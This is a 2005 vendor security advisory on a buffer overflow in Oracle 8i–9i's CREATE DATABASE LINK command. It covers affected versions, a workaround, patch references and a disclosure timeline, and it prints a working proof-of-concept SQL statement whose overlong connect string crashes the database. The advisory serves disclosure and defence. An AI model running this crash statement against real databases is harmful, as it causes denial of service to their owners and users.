Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Buffer Overflow in Create Database Link in Oracle8i - 9i

Name Buffer Overflow in Create Database Link in Oracle8i - 9i
Systems Affected Oracle 8.0 - Oracle9i (all platforms)
Severity High Risk
Category Denial of Service (Database Crash)
Vendor URL http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf
Author Alexander Kornbrust (ak at red-database-security.com)
Date 25 Apr 2005 (V 1.01)
Advisory RDS_20050118_1
Time to fix 656 days


Details
Any Oracle user with the permission to create a database link can crash the entire database by using a specially crafted connect string. By default every user (with the CONNECT role) is able to create a (private) database link.



Workarounds
Revoke the permission to create database links from the CONNECT role. A normal database user does not need this privilege.


Example

SQL> create database link crash using 'iasdb1111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111ddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddd11111111111';
2 3
*
Error in line 1:
ORA-03113: end-of-file on communication channel

SQL>




Patch Information
Please see MetaLink document ID 293953.1 for the patch download procedures and for the Patch Availability Matrix for this Oracle Security Alert. :

http://metalink.oracle.com/metalink/plsql/showdoc?db=NOT&id=293953.1


History
03-apr-2003 Oracle secalert was informed
18-apr-2003 Bug confirmed
18-jan-2005 Oracle published CPU January 2005 (aka alert 69)
25-apr-2005 Example and time to fix added


2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Workflow

Oracle Workflow is a complete business process management solution embedded in the Oracle database.

Its technology enables modeling, automation, and continuous improvement of business processes, routing information of any type according to user-defined business rules.

Oracle Workflow provides customers a scalable, production workflow system tuned for the high volumes associated with enterprise applications.